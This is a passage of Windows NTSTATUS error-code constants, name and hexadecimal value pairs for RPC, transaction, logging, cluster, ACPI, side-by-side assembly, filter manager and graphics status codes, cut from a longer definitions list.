STATUS_PORT_ALREADY_HAS_COMPLETION_LIST = 0xC000071A STATUS_CALLBACK_RETURNED_THREAD_PRIORITY = 0xC000071B STATUS_INVALID_THREAD = 0xC000071C STATUS_CALLBACK_RETURNED_TRANSACTION = 0xC000071D STATUS_CALLBACK_RETURNED_LDR_LOCK = 0xC000071E STATUS_CALLBACK_RETURNED_LANG = 0xC000071F STATUS_CALLBACK_RETURNED_PRI_BACK = 0xC0000720 STATUS_DISK_REPAIR_DISABLED = 0xC0000800 STATUS_DS_DOMAIN_RENAME_IN_PROGRESS = 0xC0000801 STATUS_DISK_QUOTA_EXCEEDED = 0xC0000802 STATUS_CONTENT_BLOCKED = 0xC0000804 STATUS_BAD_CLUSTERS = 0xC0000805 STATUS_VOLUME_DIRTY = 0xC0000806 STATUS_FILE_CHECKED_OUT = 0xC0000901 STATUS_CHECKOUT_REQUIRED = 0xC0000902 STATUS_BAD_FILE_TYPE = 0xC0000903 STATUS_FILE_TOO_LARGE = 0xC0000904 STATUS_FORMS_AUTH_REQUIRED = 0xC0000905 STATUS_VIRUS_INFECTED = 0xC0000906 STATUS_VIRUS_DELETED = 0xC0000907 STATUS_BAD_MCFG_TABLE = 0xC0000908 STATUS_CANNOT_BREAK_OPLOCK = 0xC0000909 STATUS_WOW_ASSERTION = 0xC0009898 STATUS_INVALID_SIGNATURE = 0xC000A000 STATUS_HMAC_NOT_SUPPORTED = 0xC000A001 STATUS_IPSEC_QUEUE_OVERFLOW = 0xC000A010 STATUS_ND_QUEUE_OVERFLOW = 0xC000A011 STATUS_HOPLIMIT_EXCEEDED = 0xC000A012 STATUS_PROTOCOL_NOT_SUPPORTED = 0xC000A013 STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED = 0xC000A080 STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR = 0xC000A081 STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR = 0xC000A082 STATUS_XML_PARSE_ERROR = 0xC000A083 STATUS_XMLDSIG_ERROR = 0xC000A084 STATUS_WRONG_COMPARTMENT = 0xC000A085 STATUS_AUTHIP_FAILURE = 0xC000A086 STATUS_DS_OID_MAPPED_GROUP_CANT_HAVE_MEMBERS = 0xC000A087 STATUS_DS_OID_NOT_FOUND = 0xC000A088 STATUS_HASH_NOT_SUPPORTED = 0xC000A100 STATUS_HASH_NOT_PRESENT = 0xC000A101 DBG_NO_STATE_CHANGE = 0xC0010001 DBG_APP_NOT_IDLE = 0xC0010002 RPC_NT_INVALID_STRING_BINDING = 0xC0020001 RPC_NT_WRONG_KIND_OF_BINDING = 0xC0020002 RPC_NT_INVALID_BINDING = 0xC0020003 RPC_NT_PROTSEQ_NOT_SUPPORTED = 0xC0020004 RPC_NT_INVALID_RPC_PROTSEQ = 0xC0020005 RPC_NT_INVALID_STRING_UUID = 0xC0020006 RPC_NT_INVALID_ENDPOINT_FORMAT = 0xC0020007 RPC_NT_INVALID_NET_ADDR = 0xC0020008 RPC_NT_NO_ENDPOINT_FOUND = 0xC0020009 RPC_NT_INVALID_TIMEOUT = 0xC002000A RPC_NT_OBJECT_NOT_FOUND = 0xC002000B RPC_NT_ALREADY_REGISTERED = 0xC002000C RPC_NT_TYPE_ALREADY_REGISTERED = 0xC002000D RPC_NT_ALREADY_LISTENING = 0xC002000E RPC_NT_NO_PROTSEQS_REGISTERED = 0xC002000F RPC_NT_NOT_LISTENING = 0xC0020010 RPC_NT_UNKNOWN_MGR_TYPE = 0xC0020011 RPC_NT_UNKNOWN_IF = 0xC0020012 RPC_NT_NO_BINDINGS = 0xC0020013 RPC_NT_NO_PROTSEQS = 0xC0020014 RPC_NT_CANT_CREATE_ENDPOINT = 0xC0020015 RPC_NT_OUT_OF_RESOURCES = 0xC0020016 RPC_NT_SERVER_UNAVAILABLE = 0xC0020017 RPC_NT_SERVER_TOO_BUSY = 0xC0020018 RPC_NT_INVALID_NETWORK_OPTIONS = 0xC0020019 RPC_NT_NO_CALL_ACTIVE = 0xC002001A RPC_NT_CALL_FAILED = 0xC002001B RPC_NT_CALL_FAILED_DNE = 0xC002001C RPC_NT_PROTOCOL_ERROR = 0xC002001D RPC_NT_UNSUPPORTED_TRANS_SYN = 0xC002001F RPC_NT_UNSUPPORTED_TYPE = 0xC0020021 RPC_NT_INVALID_TAG = 0xC0020022 RPC_NT_INVALID_BOUND = 0xC0020023 RPC_NT_NO_ENTRY_NAME = 0xC0020024 RPC_NT_INVALID_NAME_SYNTAX = 0xC0020025 RPC_NT_UNSUPPORTED_NAME_SYNTAX = 0xC0020026 RPC_NT_UUID_NO_ADDRESS = 0xC0020028 RPC_NT_DUPLICATE_ENDPOINT = 0xC0020029 RPC_NT_UNKNOWN_AUTHN_TYPE = 0xC002002A RPC_NT_MAX_CALLS_TOO_SMALL = 0xC002002B RPC_NT_STRING_TOO_LONG = 0xC002002C RPC_NT_PROTSEQ_NOT_FOUND = 0xC002002D RPC_NT_PROCNUM_OUT_OF_RANGE = 0xC002002E RPC_NT_BINDING_HAS_NO_AUTH = 0xC002002F RPC_NT_UNKNOWN_AUTHN_SERVICE = 0xC0020030 RPC_NT_UNKNOWN_AUTHN_LEVEL = 0xC0020031 RPC_NT_INVALID_AUTH_IDENTITY = 0xC0020032 RPC_NT_UNKNOWN_AUTHZ_SERVICE = 0xC0020033 EPT_NT_INVALID_ENTRY = 0xC0020034 EPT_NT_CANT_PERFORM_OP = 0xC0020035 EPT_NT_NOT_REGISTERED = 0xC0020036 RPC_NT_NOTHING_TO_EXPORT = 0xC0020037 RPC_NT_INCOMPLETE_NAME = 0xC0020038 RPC_NT_INVALID_VERS_OPTION = 0xC0020039 RPC_NT_NO_MORE_MEMBERS = 0xC002003A RPC_NT_NOT_ALL_OBJS_UNEXPORTED = 0xC002003B RPC_NT_INTERFACE_NOT_FOUND = 0xC002003C RPC_NT_ENTRY_ALREADY_EXISTS = 0xC002003D RPC_NT_ENTRY_NOT_FOUND = 0xC002003E RPC_NT_NAME_SERVICE_UNAVAILABLE = 0xC002003F RPC_NT_INVALID_NAF_ID = 0xC0020040 RPC_NT_CANNOT_SUPPORT = 0xC0020041 RPC_NT_NO_CONTEXT_AVAILABLE = 0xC0020042 RPC_NT_INTERNAL_ERROR = 0xC0020043 RPC_NT_ZERO_DIVIDE = 0xC0020044 RPC_NT_ADDRESS_ERROR = 0xC0020045 RPC_NT_FP_DIV_ZERO = 0xC0020046 RPC_NT_FP_UNDERFLOW = 0xC0020047 RPC_NT_FP_OVERFLOW = 0xC0020048 RPC_NT_CALL_IN_PROGRESS = 0xC0020049 RPC_NT_NO_MORE_BINDINGS = 0xC002004A RPC_NT_GROUP_MEMBER_NOT_FOUND = 0xC002004B EPT_NT_CANT_CREATE = 0xC002004C RPC_NT_INVALID_OBJECT = 0xC002004D RPC_NT_NO_INTERFACES = 0xC002004F RPC_NT_CALL_CANCELLED = 0xC0020050 RPC_NT_BINDING_INCOMPLETE = 0xC0020051 RPC_NT_COMM_FAILURE = 0xC0020052 RPC_NT_UNSUPPORTED_AUTHN_LEVEL = 0xC0020053 RPC_NT_NO_PRINC_NAME = 0xC0020054 RPC_NT_NOT_RPC_ERROR = 0xC0020055 RPC_NT_SEC_PKG_ERROR = 0xC0020057 RPC_NT_NOT_CANCELLED = 0xC0020058 RPC_NT_INVALID_ASYNC_HANDLE = 0xC0020062 RPC_NT_INVALID_ASYNC_CALL = 0xC0020063 RPC_NT_PROXY_ACCESS_DENIED = 0xC0020064 RPC_NT_NO_MORE_ENTRIES = 0xC0030001 RPC_NT_SS_CHAR_TRANS_OPEN_FAIL = 0xC0030002 RPC_NT_SS_CHAR_TRANS_SHORT_FILE = 0xC0030003 RPC_NT_SS_IN_NULL_CONTEXT = 0xC0030004 RPC_NT_SS_CONTEXT_MISMATCH = 0xC0030005 RPC_NT_SS_CONTEXT_DAMAGED = 0xC0030006 RPC_NT_SS_HANDLES_MISMATCH = 0xC0030007 RPC_NT_SS_CANNOT_GET_CALL_HANDLE = 0xC0030008 RPC_NT_NULL_REF_POINTER = 0xC0030009 RPC_NT_ENUM_VALUE_OUT_OF_RANGE = 0xC003000A RPC_NT_BYTE_COUNT_TOO_SMALL = 0xC003000B RPC_NT_BAD_STUB_DATA = 0xC003000C RPC_NT_INVALID_ES_ACTION = 0xC0030059 RPC_NT_WRONG_ES_VERSION = 0xC003005A RPC_NT_WRONG_STUB_VERSION = 0xC003005B RPC_NT_INVALID_PIPE_OBJECT = 0xC003005C RPC_NT_INVALID_PIPE_OPERATION = 0xC003005D RPC_NT_WRONG_PIPE_VERSION = 0xC003005E RPC_NT_PIPE_CLOSED = 0xC003005F RPC_NT_PIPE_DISCIPLINE_ERROR = 0xC0030060 RPC_NT_PIPE_EMPTY = 0xC0030061 STATUS_PNP_BAD_MPS_TABLE = 0xC0040035 STATUS_PNP_TRANSLATION_FAILED = 0xC0040036 STATUS_PNP_IRQ_TRANSLATION_FAILED = 0xC0040037 STATUS_PNP_INVALID_ID = 0xC0040038 STATUS_IO_REISSUE_AS_CACHED = 0xC0040039 STATUS_CTX_WINSTATION_NAME_INVALID = 0xC00A0001 STATUS_CTX_INVALID_PD = 0xC00A0002 STATUS_CTX_PD_NOT_FOUND = 0xC00A0003 STATUS_CTX_CLOSE_PENDING = 0xC00A0006 STATUS_CTX_NO_OUTBUF = 0xC00A0007 STATUS_CTX_MODEM_INF_NOT_FOUND = 0xC00A0008 STATUS_CTX_INVALID_MODEMNAME = 0xC00A0009 STATUS_CTX_RESPONSE_ERROR = 0xC00A000A STATUS_CTX_MODEM_RESPONSE_TIMEOUT = 0xC00A000B STATUS_CTX_MODEM_RESPONSE_NO_CARRIER = 0xC00A000C STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE = 0xC00A000D STATUS_CTX_MODEM_RESPONSE_BUSY = 0xC00A000E STATUS_CTX_MODEM_RESPONSE_VOICE = 0xC00A000F STATUS_CTX_TD_ERROR = 0xC00A0010 STATUS_CTX_LICENSE_CLIENT_INVALID = 0xC00A0012 STATUS_CTX_LICENSE_NOT_AVAILABLE = 0xC00A0013 STATUS_CTX_LICENSE_EXPIRED = 0xC00A0014 STATUS_CTX_WINSTATION_NOT_FOUND = 0xC00A0015 STATUS_CTX_WINSTATION_NAME_COLLISION = 0xC00A0016 STATUS_CTX_WINSTATION_BUSY = 0xC00A0017 STATUS_CTX_BAD_VIDEO_MODE = 0xC00A0018 STATUS_CTX_GRAPHICS_INVALID = 0xC00A0022 STATUS_CTX_NOT_CONSOLE = 0xC00A0024 STATUS_CTX_CLIENT_QUERY_TIMEOUT = 0xC00A0026 STATUS_CTX_CONSOLE_DISCONNECT = 0xC00A0027 STATUS_CTX_CONSOLE_CONNECT = 0xC00A0028 STATUS_CTX_SHADOW_DENIED = 0xC00A002A STATUS_CTX_WINSTATION_ACCESS_DENIED = 0xC00A002B STATUS_CTX_INVALID_WD = 0xC00A002E STATUS_CTX_WD_NOT_FOUND = 0xC00A002F STATUS_CTX_SHADOW_INVALID = 0xC00A0030 STATUS_CTX_SHADOW_DISABLED = 0xC00A0031 STATUS_RDP_PROTOCOL_ERROR = 0xC00A0032 STATUS_CTX_CLIENT_LICENSE_NOT_SET = 0xC00A0033 STATUS_CTX_CLIENT_LICENSE_IN_USE = 0xC00A0034 STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE = 0xC00A0035 STATUS_CTX_SHADOW_NOT_RUNNING = 0xC00A0036 STATUS_CTX_LOGON_DISABLED = 0xC00A0037 STATUS_CTX_SECURITY_LAYER_ERROR = 0xC00A0038 STATUS_TS_INCOMPATIBLE_SESSIONS = 0xC00A0039 STATUS_MUI_FILE_NOT_FOUND = 0xC00B0001 STATUS_MUI_INVALID_FILE = 0xC00B0002 STATUS_MUI_INVALID_RC_CONFIG = 0xC00B0003 STATUS_MUI_INVALID_LOCALE_NAME = 0xC00B0004 STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME = 0xC00B0005 STATUS_MUI_FILE_NOT_LOADED = 0xC00B0006 STATUS_RESOURCE_ENUM_USER_STOP = 0xC00B0007 STATUS_CLUSTER_INVALID_NODE = 0xC0130001 STATUS_CLUSTER_NODE_EXISTS = 0xC0130002 STATUS_CLUSTER_JOIN_IN_PROGRESS = 0xC0130003 STATUS_CLUSTER_NODE_NOT_FOUND = 0xC0130004 STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND = 0xC0130005 STATUS_CLUSTER_NETWORK_EXISTS = 0xC0130006 STATUS_CLUSTER_NETWORK_NOT_FOUND = 0xC0130007 STATUS_CLUSTER_NETINTERFACE_EXISTS = 0xC0130008 STATUS_CLUSTER_NETINTERFACE_NOT_FOUND = 0xC0130009 STATUS_CLUSTER_INVALID_REQUEST = 0xC013000A STATUS_CLUSTER_INVALID_NETWORK_PROVIDER = 0xC013000B STATUS_CLUSTER_NODE_DOWN = 0xC013000C STATUS_CLUSTER_NODE_UNREACHABLE = 0xC013000D STATUS_CLUSTER_NODE_NOT_MEMBER = 0xC013000E STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS = 0xC013000F STATUS_CLUSTER_INVALID_NETWORK = 0xC0130010 STATUS_CLUSTER_NO_NET_ADAPTERS = 0xC0130011 STATUS_CLUSTER_NODE_UP = 0xC0130012 STATUS_CLUSTER_NODE_PAUSED = 0xC0130013 STATUS_CLUSTER_NODE_NOT_PAUSED = 0xC0130014 STATUS_CLUSTER_NO_SECURITY_CONTEXT = 0xC0130015 STATUS_CLUSTER_NETWORK_NOT_INTERNAL = 0xC0130016 STATUS_CLUSTER_POISONED = 0xC0130017 STATUS_ACPI_INVALID_OPCODE = 0xC0140001 STATUS_ACPI_STACK_OVERFLOW = 0xC0140002 STATUS_ACPI_ASSERT_FAILED = 0xC0140003 STATUS_ACPI_INVALID_INDEX = 0xC0140004 STATUS_ACPI_INVALID_ARGUMENT = 0xC0140005 STATUS_ACPI_FATAL = 0xC0140006 STATUS_ACPI_INVALID_SUPERNAME = 0xC0140007 STATUS_ACPI_INVALID_ARGTYPE = 0xC0140008 STATUS_ACPI_INVALID_OBJTYPE = 0xC0140009 STATUS_ACPI_INVALID_TARGETTYPE = 0xC014000A STATUS_ACPI_INCORRECT_ARGUMENT_COUNT = 0xC014000B STATUS_ACPI_ADDRESS_NOT_MAPPED = 0xC014000C STATUS_ACPI_INVALID_EVENTTYPE = 0xC014000D STATUS_ACPI_HANDLER_COLLISION = 0xC014000E STATUS_ACPI_INVALID_DATA = 0xC014000F STATUS_ACPI_INVALID_REGION = 0xC0140010 STATUS_ACPI_INVALID_ACCESS_SIZE = 0xC0140011 STATUS_ACPI_ACQUIRE_GLOBAL_LOCK = 0xC0140012 STATUS_ACPI_ALREADY_INITIALIZED = 0xC0140013 STATUS_ACPI_NOT_INITIALIZED = 0xC0140014 STATUS_ACPI_INVALID_MUTEX_LEVEL = 0xC0140015 STATUS_ACPI_MUTEX_NOT_OWNED = 0xC0140016 STATUS_ACPI_MUTEX_NOT_OWNER = 0xC0140017 STATUS_ACPI_RS_ACCESS = 0xC0140018 STATUS_ACPI_INVALID_TABLE = 0xC0140019 STATUS_ACPI_REG_HANDLER_FAILED = 0xC0140020 STATUS_ACPI_POWER_REQUEST_FAILED = 0xC0140021 STATUS_SXS_SECTION_NOT_FOUND = 0xC0150001 STATUS_SXS_CANT_GEN_ACTCTX = 0xC0150002 STATUS_SXS_INVALID_ACTCTXDATA_FORMAT = 0xC0150003 STATUS_SXS_ASSEMBLY_NOT_FOUND = 0xC0150004 STATUS_SXS_MANIFEST_FORMAT_ERROR = 0xC0150005 STATUS_SXS_MANIFEST_PARSE_ERROR = 0xC0150006 STATUS_SXS_ACTIVATION_CONTEXT_DISABLED = 0xC0150007 STATUS_SXS_KEY_NOT_FOUND = 0xC0150008 STATUS_SXS_VERSION_CONFLICT = 0xC0150009 STATUS_SXS_WRONG_SECTION_TYPE = 0xC015000A STATUS_SXS_THREAD_QUERIES_DISABLED = 0xC015000B STATUS_SXS_ASSEMBLY_MISSING = 0xC015000C STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET = 0xC015000E STATUS_SXS_EARLY_DEACTIVATION = 0xC015000F STATUS_SXS_INVALID_DEACTIVATION = 0xC0150010 STATUS_SXS_MULTIPLE_DEACTIVATION = 0xC0150011 STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY = 0xC0150012 STATUS_SXS_PROCESS_TERMINATION_REQUESTED = 0xC0150013 STATUS_SXS_CORRUPT_ACTIVATION_STACK = 0xC0150014 STATUS_SXS_CORRUPTION = 0xC0150015 STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE = 0xC0150016 STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME = 0xC0150017 STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE = 0xC0150018 STATUS_SXS_IDENTITY_PARSE_ERROR = 0xC0150019 STATUS_SXS_COMPONENT_STORE_CORRUPT = 0xC015001A STATUS_SXS_FILE_HASH_MISMATCH = 0xC015001B STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT = 0xC015001C STATUS_SXS_IDENTITIES_DIFFERENT = 0xC015001D STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT = 0xC015001E STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY = 0xC015001F STATUS_ADVANCED_INSTALLER_FAILED = 0xC0150020 STATUS_XML_ENCODING_MISMATCH = 0xC0150021 STATUS_SXS_MANIFEST_TOO_BIG = 0xC0150022 STATUS_SXS_SETTING_NOT_REGISTERED = 0xC0150023 STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE = 0xC0150024 STATUS_SMI_PRIMITIVE_INSTALLER_FAILED = 0xC0150025 STATUS_GENERIC_COMMAND_FAILED = 0xC0150026 STATUS_SXS_FILE_HASH_MISSING = 0xC0150027 STATUS_TRANSACTIONAL_CONFLICT = 0xC0190001 STATUS_INVALID_TRANSACTION = 0xC0190002 STATUS_TRANSACTION_NOT_ACTIVE = 0xC0190003 STATUS_TM_INITIALIZATION_FAILED = 0xC0190004 STATUS_RM_NOT_ACTIVE = 0xC0190005 STATUS_RM_METADATA_CORRUPT = 0xC0190006 STATUS_TRANSACTION_NOT_JOINED = 0xC0190007 STATUS_DIRECTORY_NOT_RM = 0xC0190008 STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE = 0xC019000A STATUS_LOG_RESIZE_INVALID_SIZE = 0xC019000B STATUS_REMOTE_FILE_VERSION_MISMATCH = 0xC019000C STATUS_CRM_PROTOCOL_ALREADY_EXISTS = 0xC019000F STATUS_TRANSACTION_PROPAGATION_FAILED = 0xC0190010 STATUS_CRM_PROTOCOL_NOT_FOUND = 0xC0190011 STATUS_TRANSACTION_SUPERIOR_EXISTS = 0xC0190012 STATUS_TRANSACTION_REQUEST_NOT_VALID = 0xC0190013 STATUS_TRANSACTION_NOT_REQUESTED = 0xC0190014 STATUS_TRANSACTION_ALREADY_ABORTED = 0xC0190015 STATUS_TRANSACTION_ALREADY_COMMITTED = 0xC0190016 STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER = 0xC0190017 STATUS_CURRENT_TRANSACTION_NOT_VALID = 0xC0190018 STATUS_LOG_GROWTH_FAILED = 0xC0190019 STATUS_OBJECT_NO_LONGER_EXISTS = 0xC0190021 STATUS_STREAM_MINIVERSION_NOT_FOUND = 0xC0190022 STATUS_STREAM_MINIVERSION_NOT_VALID = 0xC0190023 STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION = 0xC0190024 STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT = 0xC0190025 STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS = 0xC0190026 STATUS_HANDLE_NO_LONGER_VALID = 0xC0190028 STATUS_LOG_CORRUPTION_DETECTED = 0xC0190030 STATUS_RM_DISCONNECTED = 0xC0190032 STATUS_ENLISTMENT_NOT_SUPERIOR = 0xC0190033 STATUS_FILE_IDENTITY_NOT_PERSISTENT = 0xC0190036 STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY = 0xC0190037 STATUS_CANT_CROSS_RM_BOUNDARY = 0xC0190038 STATUS_TXF_DIR_NOT_EMPTY = 0xC0190039 STATUS_INDOUBT_TRANSACTIONS_EXIST = 0xC019003A STATUS_TM_VOLATILE = 0xC019003B STATUS_ROLLBACK_TIMER_EXPIRED = 0xC019003C STATUS_TXF_ATTRIBUTE_CORRUPT = 0xC019003D STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION = 0xC019003E STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED = 0xC019003F STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE = 0xC0190040 STATUS_TRANSACTION_REQUIRED_PROMOTION = 0xC0190043 STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION = 0xC0190044 STATUS_TRANSACTIONS_NOT_FROZEN = 0xC0190045 STATUS_TRANSACTION_FREEZE_IN_PROGRESS = 0xC0190046 STATUS_NOT_SNAPSHOT_VOLUME = 0xC0190047 STATUS_NO_SAVEPOINT_WITH_OPEN_FILES = 0xC0190048 STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION = 0xC0190049 STATUS_TM_IDENTITY_MISMATCH = 0xC019004A STATUS_FLOATED_SECTION = 0xC019004B STATUS_CANNOT_ACCEPT_TRANSACTED_WORK = 0xC019004C STATUS_CANNOT_ABORT_TRANSACTIONS = 0xC019004D STATUS_TRANSACTION_NOT_FOUND = 0xC019004E STATUS_RESOURCEMANAGER_NOT_FOUND = 0xC019004F STATUS_ENLISTMENT_NOT_FOUND = 0xC0190050 STATUS_TRANSACTIONMANAGER_NOT_FOUND = 0xC0190051 STATUS_TRANSACTIONMANAGER_NOT_ONLINE = 0xC0190052 STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION = 0xC0190053 STATUS_TRANSACTION_NOT_ROOT = 0xC0190054 STATUS_TRANSACTION_OBJECT_EXPIRED = 0xC0190055 STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION = 0xC0190056 STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED = 0xC0190057 STATUS_TRANSACTION_RECORD_TOO_LONG = 0xC0190058 STATUS_NO_LINK_TRACKING_IN_TRANSACTION = 0xC0190059 STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION = 0xC019005A STATUS_TRANSACTION_INTEGRITY_VIOLATED = 0xC019005B STATUS_EXPIRED_HANDLE = 0xC0190060 STATUS_TRANSACTION_NOT_ENLISTED = 0xC0190061 STATUS_LOG_SECTOR_INVALID = 0xC01A0001 STATUS_LOG_SECTOR_PARITY_INVALID = 0xC01A0002 STATUS_LOG_SECTOR_REMAPPED = 0xC01A0003 STATUS_LOG_BLOCK_INCOMPLETE = 0xC01A0004 STATUS_LOG_INVALID_RANGE = 0xC01A0005 STATUS_LOG_BLOCKS_EXHAUSTED = 0xC01A0006 STATUS_LOG_READ_CONTEXT_INVALID = 0xC01A0007 STATUS_LOG_RESTART_INVALID = 0xC01A0008 STATUS_LOG_BLOCK_VERSION = 0xC01A0009 STATUS_LOG_BLOCK_INVALID = 0xC01A000A STATUS_LOG_READ_MODE_INVALID = 0xC01A000B STATUS_LOG_METADATA_CORRUPT = 0xC01A000D STATUS_LOG_METADATA_INVALID = 0xC01A000E STATUS_LOG_METADATA_INCONSISTENT = 0xC01A000F STATUS_LOG_RESERVATION_INVALID = 0xC01A0010 STATUS_LOG_CANT_DELETE = 0xC01A0011 STATUS_LOG_CONTAINER_LIMIT_EXCEEDED = 0xC01A0012 STATUS_LOG_START_OF_LOG = 0xC01A0013 STATUS_LOG_POLICY_ALREADY_INSTALLED = 0xC01A0014 STATUS_LOG_POLICY_NOT_INSTALLED = 0xC01A0015 STATUS_LOG_POLICY_INVALID = 0xC01A0016 STATUS_LOG_POLICY_CONFLICT = 0xC01A0017 STATUS_LOG_PINNED_ARCHIVE_TAIL = 0xC01A0018 STATUS_LOG_RECORD_NONEXISTENT = 0xC01A0019 STATUS_LOG_RECORDS_RESERVED_INVALID = 0xC01A001A STATUS_LOG_SPACE_RESERVED_INVALID = 0xC01A001B STATUS_LOG_TAIL_INVALID = 0xC01A001C STATUS_LOG_FULL = 0xC01A001D STATUS_LOG_MULTIPLEXED = 0xC01A001E STATUS_LOG_DEDICATED = 0xC01A001F STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS = 0xC01A0020 STATUS_LOG_ARCHIVE_IN_PROGRESS = 0xC01A0021 STATUS_LOG_EPHEMERAL = 0xC01A0022 STATUS_LOG_NOT_ENOUGH_CONTAINERS = 0xC01A0023 STATUS_LOG_CLIENT_ALREADY_REGISTERED = 0xC01A0024 STATUS_LOG_CLIENT_NOT_REGISTERED = 0xC01A0025 STATUS_LOG_FULL_HANDLER_IN_PROGRESS = 0xC01A0026 STATUS_LOG_CONTAINER_READ_FAILED = 0xC01A0027 STATUS_LOG_CONTAINER_WRITE_FAILED = 0xC01A0028 STATUS_LOG_CONTAINER_OPEN_FAILED = 0xC01A0029 STATUS_LOG_CONTAINER_STATE_INVALID = 0xC01A002A STATUS_LOG_STATE_INVALID = 0xC01A002B STATUS_LOG_PINNED = 0xC01A002C STATUS_LOG_METADATA_FLUSH_FAILED = 0xC01A002D STATUS_LOG_INCONSISTENT_SECURITY = 0xC01A002E STATUS_LOG_APPENDED_FLUSH_FAILED = 0xC01A002F STATUS_LOG_PINNED_RESERVATION = 0xC01A0030 STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD = 0xC01B00EA STATUS_FLT_NO_HANDLER_DEFINED = 0xC01C0001 STATUS_FLT_CONTEXT_ALREADY_DEFINED = 0xC01C0002 STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST = 0xC01C0003 STATUS_FLT_DISALLOW_FAST_IO = 0xC01C0004 STATUS_FLT_INVALID_NAME_REQUEST = 0xC01C0005 STATUS_FLT_NOT_SAFE_TO_POST_OPERATION = 0xC01C0006 STATUS_FLT_NOT_INITIALIZED = 0xC01C0007 STATUS_FLT_FILTER_NOT_READY = 0xC01C0008 STATUS_FLT_POST_OPERATION_CLEANUP = 0xC01C0009 STATUS_FLT_INTERNAL_ERROR = 0xC01C000A STATUS_FLT_DELETING_OBJECT = 0xC01C000B STATUS_FLT_MUST_BE_NONPAGED_POOL = 0xC01C000C STATUS_FLT_DUPLICATE_ENTRY = 0xC01C000D STATUS_FLT_CBDQ_DISABLED = 0xC01C000E STATUS_FLT_DO_NOT_ATTACH = 0xC01C000F STATUS_FLT_DO_NOT_DETACH = 0xC01C0010 STATUS_FLT_INSTANCE_ALTITUDE_COLLISION = 0xC01C0011 STATUS_FLT_INSTANCE_NAME_COLLISION = 0xC01C0012 STATUS_FLT_FILTER_NOT_FOUND = 0xC01C0013 STATUS_FLT_VOLUME_NOT_FOUND = 0xC01C0014 STATUS_FLT_INSTANCE_NOT_FOUND = 0xC01C0015 STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND = 0xC01C0016 STATUS_FLT_INVALID_CONTEXT_REGISTRATION = 0xC01C0017 STATUS_FLT_NAME_CACHE_MISS = 0xC01C0018 STATUS_FLT_NO_DEVICE_OBJECT = 0xC01C0019 STATUS_FLT_VOLUME_ALREADY_MOUNTED = 0xC01C001A STATUS_FLT_ALREADY_ENLISTED = 0xC01C001B STATUS_FLT_CONTEXT_ALREADY_LINKED = 0xC01C001C STATUS_FLT_NO_WAITER_FOR_REPLY = 0xC01C0020 STATUS_MONITOR_NO_DESCRIPTOR = 0xC01D0001 STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT = 0xC01D0002 STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM = 0xC01D0003 STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK = 0xC01D0004 STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED = 0xC01D0005 STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK = 0xC01D0006 STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK = 0xC01D0007 STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA = 0xC01D0008 STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK = 0xC01D0009 STATUS_MONITOR_INVALID_MANUFACTURE_DATE = 0xC01D000A STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER = 0xC01E0000 STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER = 0xC01E0001 STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER = 0xC01E0002 STATUS_GRAPHICS_ADAPTER_WAS_RESET = 0xC01E0003 STATUS_GRAPHICS_INVALID_DRIVER_MODEL = 0xC01E0004 STATUS_GRAPHICS_PRESENT_MODE_CHANGED = 0xC01E0005 STATUS_GRAPHICS_PRESENT_OCCLUDED = 0xC01E0006 STATUS_GRAPHICS_PRESENT_DENIED = 0xC01E0007 STATUS_GRAPHICS_CANNOTCOLORCONVERT = 0xC01E0008 STATUS_GRAPHICS_PRESENT_REDIRECTION_DISABLED = 0xC01E000B STATUS_GRAPHICS_PRESENT_UNOCCLUDED = 0xC01E000C STATUS_GRAPHICS_NO_VIDEO_MEMORY = 0xC01E0100 STATUS_GRAPHICS_CANT_LOCK_MEMORY = 0xC01E0101 STATUS_GRAPHICS_ALLOCATION_BUSY = 0xC01E0102 STATUS_GRAPHICS_TOO_MANY_REFERENCES = 0xC01E0103 STATUS_GRAPHICS_TRY_AGAIN_LATER = 0xC01E0104 STATUS_GRAPHICS_TRY_AGAIN_NOW = 0xC01E0105 